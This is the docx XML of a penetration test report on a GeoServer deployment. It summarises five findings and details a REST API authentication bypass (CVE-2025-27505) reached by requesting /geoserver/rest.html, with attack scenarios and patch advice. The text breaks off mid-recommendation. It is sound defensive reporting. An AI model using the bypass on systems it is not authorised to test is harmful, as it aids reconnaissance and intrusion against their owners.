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1669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>1.  Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>2.  Vulnerability Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>3.  Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">3.1  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> REST API Authentication Bypass (CVE-2025-27505)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3.2  XML</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> External Entity (XXE) Injection via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> WFS (CVE-2025-30220)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3.3  Unauthenticated</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Access to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Administration Panel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3.4  Sensitive</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Data Exposure via Unauthenticated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenLayers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3.5  JWT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Token Remains Valid After Logout (Missing Token Revocation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A penetration test was conducted against the external web application and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> infrastructure components as part of engagement ASF-78. The assessment focused on identifying security vulnerabilities that could be exploited by an external adversary with no prior knowledge or access credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The application under review is externally accessible but does not offer a public registration portal. Account creation requires an existing authenticated user, which significantly reduces the attack surface for unauthenticated threat actors. This context has been factored into the risk ratings presented throughout this report.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A total of five (5) security vulnerabilities were identified during this engagement, ranging in severity from Medium to High. Two of the findings are linked to publicly disclosed CVEs affecting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — a widely used open-source geospatial server — and require immediate patching attention. The remaining findings relate to authentication logic weaknesses, information disclosure, and session management gaps.</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B21669" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Finding</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B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Severity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B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Impact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rsidR="00B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">3.1 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>GeoServer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> REST API Auth Bypass (CVE-2025-27505)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="156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50" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Low</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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">3.2 XXE Injection via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>GeoServer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> WFS (CVE-2025-30220)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF4500"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>High</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High</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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">3.3 Unauthenticated </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>GeoServer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Admin Panel Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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High</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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">3.4 Sensitive Data Exposure via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>OpenLayers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9900"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B216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r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3.5 JWT Token Valid After Logout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="156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50" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Low</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B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Note: Severity ratings reflect the contextual risk of each vulnerability given the external application's restricted access model (no public registration, authentication required to create accounts). While the underlying vulnerabilities may carry higher CVSS base scores, the practical exploitability for an external, unauthenticated attacker is materially reduced.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2. Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">3.1  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> REST API Authentication Bypass (CVE-2025-27505)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE-2025-27505 is a Missing Authorization vulnerability (CWE-862) in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> REST API security configuration. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Spring Security filter is configured to intercept requests matching the path patterns /rest and /rest/** — but it does not correctly handle requests where the path includes a file extension, such as /rest.html, /rest.xml, or /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rest.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>. As a result, an unauthenticated user can access the REST API index page by appending an extension to the URL, bypassing the intended authentication requirement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>During testing, the REST API index page was successfully accessed at /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>geoserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/rest.html without providing any credentials. While the index page was rendered and its content was visible, individual items and links within the page required authentication when clicked. This indicates that the exploitation was partial — the bypass successfully exposed the REST API index and enumerated installed extensions and available endpoints, but further interaction with those endpoints remained protected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Although full administrative access was not achieved through this bypass alone, the information disclosed on the index page (installed extensions, endpoint paths, version details) is valuable reconnaissance data that can be used to plan targeted follow-up attacks.</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6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rsidR="00B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Severity: Low</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Impact: Medium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Likelihood: Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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B21669" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Affected Hosts / URLs</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geoserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/rest.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
        <w:ind w:left="720" w:right="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Screenshot: Unauthenticated access to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>geoserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/rest.html showing REST API index page with installed extensions and endpoints visible]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Attack &amp; Risk Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An unauthenticated external attacker who discovers a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> deployment can access /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>geoserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/rest.html and retrieve a full listing of installed extensions and available REST API endpoints. This reconnaissance capability enables the attacker to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identify which </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> extensions are installed (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ImageMosaic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, WPS, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoWebCache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>), narrowing the attack surface for subsequent exploitation of known extension-specific vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Enumerate available REST endpoint paths, providing a roadmap for further targeted testing or brute-force attacks against authenticated endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Correlate disclosed extension information with published CVEs to determine whether additional vulnerabilities apply to the deployed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> instance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Chain this finding with other vulnerabilities (such as CVE-2025-30220 in this report) to increase the precision and success probability of follow-on attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Given that the application has no public registration page and accounts require creation by an existing authenticated user, the immediate risk of privilege escalation through this bypass is low. However, the information leakage it provides meaningfully aids a determined attacker in fingerprinting the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Upgrade </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to version 2.26.3 or 2.25.6 (or later), as these versions patch CVE-2025-27505 by updating the path patterns in the Spring Security configuration to correctly cover extensions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>If an immediate upgrade is not feasible, apply the vendor-documented workaround: in ${GEOSERVER_DATA_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>DIR}/security/config.xml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, change the paths for the rest filter to /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rest.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">,/rest/** and the paths for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gwc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> filter to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
